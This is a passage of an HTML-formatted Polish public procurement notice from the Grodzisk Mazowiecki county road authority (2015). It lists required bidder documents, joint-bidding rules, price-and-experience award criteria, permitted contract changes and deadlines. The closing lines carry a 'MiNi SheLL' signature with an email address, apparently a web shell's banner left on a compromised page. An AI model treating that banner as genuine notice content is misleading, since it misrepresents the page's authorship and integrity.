<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać łącznie warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w SIWZ, przy czym każdy z nich odrębnie musi potwierdzić nie podleganie wykluczeniu z postępowania. 2.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnictwo powinno jednoznacznie określać postępowanie i precyzować zakres umocowania, musi też wymieniać wszystkich Wykonawców, którzy wspólnie ubiegają się o zamówienie. Na dokumencie pełnomocnictwa, w imieniu poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia, muszą podpisać się osoby, które są uprawnione do działania w imieniu poszczególnych Wykonawców. Pełnomocnictwo to powinno być złożone w oryginale lub kopii potwierdzonej notarialnie. Umocowanie Pełnomocnika musi wynikać z treści pełnomocnictwa przedłożonego wraz z ofertą.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie Wykonawcy - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach: 1)zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 2)zmiana terminu wykonania zamówienia, w uzasadnionych przypadkach wynikających z przedłużającego się terminu przeprowadzenia oceny oddziaływania przedsięwzięcia na środowisko, uzyskania opinii i uzgodnień niezbędnych do złożenia wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej spowodowanymi w szczególności następującymi okolicznościami: a)Złożenie skargi lub wniosku do właściwych organów administracyjnych lub sądowych lub odwołania od ich rozstrzygnięcia, o ile będą miały wpływ na zmianę terminu realizacji, b)Ograniczenie w dostępie do terenu objętego projektem, c)Zmiany w uzbrojeniu i naniesieniach terenu w stosunku do danych w zasobach geodezyjnych, d)Udokumentowane, dłuższe niż określone w odpowiednich przepisach oczekiwanie na dokumenty formalne i uzgodnienia niezbędne do wykonania projektów, mimo złożenia prawidłowego wniosku, e)Zmiana przepisów związanych z przedmiotem umowy dokonana po zawarciu umowy. 3)zmiany lub rezygnacji z podwykonawcy dotyczącej podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia publicznego. 4)zmiany podwykonawców lub zakresu usług wykonywanych przez podwykonawców. 5)wystąpienie siły wyższej. 6)zmiany uzasadnione okolicznościami o których mowa w art. 357 (1)Kodeksu Cywilnego. 7)jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ, mimo zachowania należytej staranności przez Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdgm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Grodzisku Mazowieckim, 05 -825 Grodzisk Mazowiecki ul. Traugutta 41.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2015 godzina 08:50, miejsce: sekretariat Powiatowego Zarządu Dróg w Grodzisku Mazowieckim, 05-825 Grodzisk Maz. ul. Traugutta 41, I piętro, pokój nr 2..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com